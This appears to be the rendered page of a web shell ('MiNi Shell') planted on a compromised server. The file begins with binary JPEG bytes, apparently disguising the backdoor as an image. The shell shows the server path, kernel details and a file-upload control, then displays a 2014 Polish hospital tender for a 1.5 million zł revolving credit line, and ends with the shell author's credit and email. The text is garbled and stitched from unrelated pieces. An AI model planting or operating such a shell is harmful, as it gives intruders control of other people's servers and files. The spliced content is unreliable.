JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140325/101002-N-2014.html

<p class="kh_header"><b>Ruda Śląska: Przetarg nieograniczony nr 14/PN/14 na usługę udzielenia i obsługi kredytu odnawialnego w rachunku bieżącym w wysokości 1 500 000,00 zł</b><br>
<b>Numer ogłoszenia: 101002 - 2014; data zamieszczenia: 25.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Rudzie Śląskiej Sp. z o.o. , ul. W. Lipa 2, 41-703 Ruda Śląska, woj. śląskie, tel. 32 248 24 52, faks 32 779 59 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalruda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp. z o.o.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 14/PN/14 na usługę udzielenia i obsługi kredytu odnawialnego w rachunku bieżącym w wysokości 1 500 000,00 zł.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa udzielenia i obsługi kredytu odnawialnego w rachunku bieżącym Szpitalowi Miejskiemu w Rudzie Śląskiej Sp. z o.o. 
2.	Zamawiający wymaga uruchomienia kredytu w wysokości 1 500 000,00 zł (w PLN). 
3.	Przewidywana realna wykorzystywana kwota kredytu: 1 000.000 zł
4.	Okres kredytowania: 1 rok (365 dni) od dnia 24.05.2014 roku (uruchomienie kredytu) po tym okresie umowa ulega wygaśnięciu.
5.	Przewidywana realna ilość dni wykorzystania kredytu: 180 dni (średnio 15 dni w miesiącu).
6.	Przeznaczenie kredytu: na sfinansowanie bieżącej działalności, bez konieczności określenia celu kredytowania.
7.	Udzielenie kredytu ze zmienną stopą procentową w oparciu o aktualną stawkę WIBOR 1 M (z każdego dnia) powiększonej o stałą marżę banku. Oprocentowanie liczone od faktycznie wykorzystanej kwoty kredytu. Odsetki regulowane miesięcznie. Do obliczania odsetek przyjmuje się, że miesiąc ma rzeczywistą liczbę dni, a rok ma 
365 dni. W całym okresie kredytowania naliczanie odsetek winno być dokonywane według metody kapitałowej, to znaczy od aktualnego zadłużenia z tytułu kredytu.
8.	Zamawiający nie dopuszcza możliwości zaproponowania przez Wykonawcę w swojej ofercie żadnych innych opłat, poza wymienionymi w formularzu ofertowym, w oparciu o aktualną stawkę WIBOR 1 M powiększonej 
o stałą marżę banku. 
9.	Dla celu porównania składanych ofert przyjmuje się stawkę WIBOR 1 M w wysokości 2,61 %.
10.	Zaproponowana marża banku w okresie kredytowania nie może ulec podwyższeniu. Na wniosek Zamawiającego istnieje możliwość zmniejszenia marży banku, na zasadzie aneksu do umowy, bez ponoszenia dodatkowych opłat 
z tytuły tej zmiany.
11.	Akceptowane zabezpieczenia: Cesja wierzytelności kontraktu NFZ na udzielone świadczenia medyczne 
w wysokości kwoty kredytu wraz z odsetkami, prowizjami oraz innymi kosztami, związanymi z umową kredytu, wynikającymi z ksiąg Banku. Dopuszcza się także oświadczenie o poddaniu się egzekucji do wysokości kredytu, tj. 1 500 000,00 zł. 
12.	Zamawiający zastrzega, iż kwota miesięcznych wpływów środków wraz z wpływami środków pochodzących 
z przelewów z innych rachunków i lokat terminowych Zamawiającego na rachunek bieżący Zamawiającego, 
w którym udzielony jest kredyt odnawialny, nie musi być wyższa niż kwota udzielonego kredytu odnawialnego. 
13.	Zamawiający zastrzega, iż udzielenie kredytu odnawialnego nie może się wiązać z koniecznością zamknięcia pozostałych innych rachunków bankowych Zamawiającego oraz brakiem możliwości otwarcia kolejnych rachunków bankowych.
14.	Udzielenie kredytu odnawialnego nie może obligować kontrahentów zewnętrznych (odbiorców) Zamawiającego do regulowania należności na rachunek bankowy, na którym będzie ewidencjonowany kredyt odnawialny, będący przedmiotem zamówienia. 
15.	Dopuszcza się możliwość naliczania opłat i prowizji za prowadzenie rachunku bankowego, na którym będzie ewidencjonowany kredyt odnawialny. Do celów porównania składanych ofert przyjmuje się krotność miesięcznych opłat i prowizji wykazanych w formularzu ofertowym. Krotność wykazanych w formularzu rodzajów opłat 
i prowizji może ulec zmianie, w zależności od potrzeb Szpitala. 
16.	Zamawiający zastrzega, iż przez okres obowiązywania umowy koszt jednostkowy opłat i prowizji wykazanych 
w formularzu ofertowym, związanych z korzystaniem z kredytu,  nie może ulec  zmianie. 
17.	Zamawiający zastrzega, iż katalog opłat i prowizji wykazany w formularzu ofertowym stanowi katalog zamknięty. Pozostałe czynności związane z korzystaniem z kredytu odnawialnego przy pomocy rachunku bankowego, nie wykazane w katalogu opłat i prowizji w formularzu ofertowy, dokonywane są nieodpłatnie przez cały okres obowiązywania umowy. 
18.	Konieczne jest, aby rachunek bankowy, na którym ewidencjonowany jest kredyt odnawialny posiadał:
1)	Dostęp do bankowości elektronicznej
2)	Bezpieczny podpis elektroniczny
3)	Dostęp do Infolinii minimum w dni robocze w godzinach 8.00 - 18.00.
19.	Spłata kapitału kredytu dokonana będzie jednorazowo po okresie 12 miesięcy od daty uruchomienia kredytu w wysokości salda kredytu wykorzystanego na ten dzień.
20.	Spłata kredytu będzie następowała automatycznie, z wpływów na istniejący rachunek bieżący określony 
w umowie.
21.	Zamawiający zastrzega możliwość wcześniejszej spłaty kredytu bez żadnych konsekwencji finansowych 
i jakichkolwiek opłat.
22.	Zamawiający zastrzega możliwość niewykorzystania kredytu w zadeklarowanej wysokości. Niewykorzystanie kredytu nie będzie skutkowało naliczeniem dodatkowych opłat.
23.	Niezbędne do podjęcia decyzji kredytowej dokumenty Spółki - do pobrania w siedzibie Zamawiającego               po wcześniejszym uzgodnienie terminu odbioru lub za pośrednictwem Poczty Polskiej, na wniosek złożony  Zamawiającemu, podpisany przez osoby uprawnione do reprezentowania Wykonawcy. Dopuszcza się możliwość przesyłania dokumentów za pośrednictwem firmy kurierskiej tylko w przypadku, gdy Wykonawca zobowiąże się pokryć koszty przesyłki kurierskiej. 
24.	Zamawiający zastrzega możliwość odmowy przekazania dokumentów, które według Spółki naruszają tajemnicę przedsiębiorstwa.
25.	Zamawiający nie przewiduje w niniejszym postępowaniu przeprowadzenia aukcji elektronicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący uprawnień do wykonywania określonej działalności lub czynności, jeżeli złoży aktualne 
zezwolenie na prowadzenie działalności zgodnie z ustawą Prawo bankowe, a w przypadku banków przekształconych z państwowych, pisemne oświadczenie, że Bank prowadzi działalność na podstawie stosowanego rozporządzenia Rady Ministrów. W przypadku zagranicznych instytucji kredytowych w rozumieniu Prawa bankowego, w miejsce w/w dokumentu należy przedstawić odpowiedni dokument z kraju (siedziby) baku, potwierdzający prawo do prowadzenia działalności bankowej oraz zawiadomienie złożone w Komisji Nadzoru Bankowego o prowadzeniu działalności na terytorium Rzeczpospolitej Polskiej w formie oddziału lub w ramach działalności transgranicznej. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o dokument i oświadczenie, sporządzone wg załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli złoży oświadczenie sporządzone wg załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie, sporządzone wg załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym, jeżeli złoży oświadczenie sporządzone wg. załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie sporządzone wg. załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia, należy złożyć oświadczenie sporządzone wg załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie, sporządzone wg załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia sytuacji ekonomicznej i finansowej należy złożyć oświadczenie sporządzone wg. załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie sporządzone wg. załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, jest zobowiązany udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem notarialnie lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający zasoby.
       Jeżeli Wykonawca, wskazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp               do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu;
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę przy wykonywaniu zamówienia;
c)	charakteru stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
d)	zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia. 
2.	Formularz ofertowy sporządzony wg załącznika nr 1 do SIWZ.
3. Oświadczenie Wykonawcy sporządzone wg załącznika nr 2 do SIWZ.
4. Projekt umowy kredytu wraz z wszystkimi jego załącznikami sporządzony przez Wykonawcę zawierający postanowienia opisane w rozdziale XIX SIWZ -Istotne dla stron postanowienia, które zostaną wprowadzone w treści zawieranej umowy w sprawie zamówienia publicznego, ogólne warunki umowy albo wzór umowy, jeżeli zamawiający wymaga od wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach.
5.	Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.
UWAGA: Wykonawcy mogą składać wszystkie wykazy, informacje czy oświadczenia także na własnych drukach pod warunkiem, że będą one opracowane według schematu druków załączonych do niniejszej specyfikacji (załączniki nr 1-6 do SIWZ).
6. W przypadku, gdy Wykonawcą składającym ofertę jest osoba fizyczna należy złożyć oświadczenie w zakresie art. 24 ust 1 pkt 2 ustawy Prawo zamówień publicznych z dnia 29.01.2004 r. (tekst jednolity Dz. U. z 2013 r., poz. 907 z późn. zmianami) wg załącznika nr 5 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalruda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Rudzie Śląskiej Sp. z o.o., 41-703 Ruda Śląska, ul. Wincentego Lipa 2, Dział Zamówień Publicznych i Logistyki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2014 godzina 09:30, miejsce: Szpital Miejski w Rudzie Śląskiej Sp. z o.o., 41-703 Ruda Śląska, ul. Wincentego Lipa 2, Dział Zamówień Publicznych i Logistyki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> ISTOTNE DLA STRON POSTANOWIENIA, KTÓRE ZOSTANĄ WPROWADZONE W TREŚCI ZAWIERANEJ UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO, OGÓLNE WARUNKI             UMOWY ALBO WZÓR UMOWY, JEŻELI ZAMAWIAJĄCY WYMAGA OD WYKONAWCY, ABY ZAWARŁ Z NIM UMOWĘ W SPRAWIE ZAMÓWIENIA PUBLICZNEGO NA TAKICH WARUNKACH.

1.	Wykonawca, którego oferta zostanie uznana za najkorzystniejszą jest zobowiązany do zawarcia umowy, sporządza projekt umowy z uwzględnieniem warunków zawartych w SIWZ i treści oferty na własny koszt.
UWAGA: wszelkie postanowienia związane z udzieleniem kredytu muszą znaleźć się w treści się projektu umowy a w szczególności.:
1)	Przedmiotem zamówienia: udzielenie i obsługa kredytu odnawialnego w rachunku bieżącym Szpitalowi Miejskiemu w Rudzie Śląskiej Sp. z o.o.
2)	Zamawiający wymaga uruchomienia kredytu w wysokości 1 500 000,00 zł (w PLN). 
3)	Okres kredytowania: 1 rok (365 dni) od dnia 24.05.2014 r., po tym okresie umowa ulega wygaśnięciu.
4)	Przeznaczenie kredytu: na sfinansowanie bieżącej działalności, bez konieczności określenia celu kredytowania.
5)	Udzielenie kredytu ze zmienną stopą procentową w oparciu o aktualną stawkę WIBOR 1 M (z każdego dnia) powiększonej o stałą marżę banku. Oprocentowanie liczone od faktycznie wykorzystanej kwoty kredytu. Odsetki regulowane miesięcznie. Do obliczania odsetek przyjmuje się, że miesiąc ma rzeczywistą liczbę dni, 
a rok ma 365 dni. W całym okresie kredytowania naliczanie odsetek winno być dokonywane według metody kapitałowej, to znaczy od aktualnego zadłużenia z tytułu kredytu.
6)	Brak innych opłat, poza wymienionymi w formularzu ofertowym, w oparciu o aktualną stawkę WIBOR 1 M powiększonej o stałą marżę banku. 
7)	Zaproponowana marża banku w okresie kredytowania nie może ulec podwyższeniu. Na wniosek Zamawiającego istnieje możliwość zmniejszenia marży banku, na zasadzie aneksu do umowy, bez ponoszenia dodatkowych opłat z tytuły tej zmiany.
8)	Akceptowane zabezpieczenia: Cesja wierzytelności kontraktu NFZ na udzielone świadczenia medyczne 
w wysokości kwoty kredytu wraz z odsetkami, prowizjami oraz innymi kosztami, związanymi z umową kredytu, wynikającymi z ksiąg Banku. Dopuszcza się także oświadczenie o poddaniu się egzekucji                 do wysokości kredytu, tj. 1 500 000,00 zł. 
9)	Kwota miesięcznych wpływów środków wraz z wpływami środków pochodzących z przelewów z innych rachunków i lokat terminowych Zamawiającego na rachunek bieżący Zamawiającego, w którym udzielony jest kredyt odnawialny, nie musi być wyższa niż kwota udzielonego kredytu odnawialnego. 
10)	Udzielenie kredytu odnawialnego nie może się wiązać z koniecznością zamknięcia pozostałych innych rachunków bankowych Zamawiającego oraz brakiem możliwości otwarcia kolejnych rachunków bankowych.
11)	Udzielenie kredytu odnawialnego nie może obligować kontrahentów zewnętrznych (odbiorców) Zamawiającego do regulowania należności na rachunek bankowy, na którym będzie ewidencjonowany kredyt odnawialny, będący przedmiotem zamówienia. 
12)	Dopuszcza się możliwość naliczania opłat i prowizji za prowadzenie rachunku bankowego, na którym będzie ewidencjonowany kredyt odnawialny. 
13)	Przez okres obowiązywania umowy koszt jednostkowy opłat i prowizji wykazanych w formularzu ofertowym, związanych z korzystaniem z kredytu,  nie może ulec  zmianie. 
14)	Katalog opłat i prowizji wykazany w formularzu ofertowym stanowi katalog zamknięty. Pozostałe czynności związane z korzystaniem z kredytu odnawialnego przy pomocy rachunku bankowego, nie wykazane 
w katalogu opłat i prowizji w formularzu ofertowy, dokonywane są nieodpłatnie przez cały okres obowiązywania umowy. 
15)	Spłata kapitału kredytu dokonana będzie jednorazowo po okresie 12 miesięcy od daty uruchomienia kredytu 
w wysokości salda kredytu wykorzystanego na ten dzień.
16)	Spłata kredytu będzie następowała automatycznie, z wpływów na istniejący rachunek bieżący określony 
w umowie.
17)	Zamawiający zastrzega możliwość wcześniejszej spłaty kredytu bez żadnych konsekwencji finansowych 
i jakichkolwiek opłat.
18)	Zamawiający zastrzega możliwość niewykorzystania kredytu w zadeklarowanej wysokości. Niewykorzystanie kredytu nie będzie skutkowało naliczeniem dodatkowych opłat.
19)	Zasady zmiany umowy i rozstrzygania ewentualnych sporów z uwzględnieniem zapisów Działu IV - Umowy 
w sprawach zamówień publicznych - ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
20)	Zapis określający, że spory mogące powstać na tle zawartej umowy będzie rozstrzygał sąd właściwy                     ze względu na siedzibę Zamawiającego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com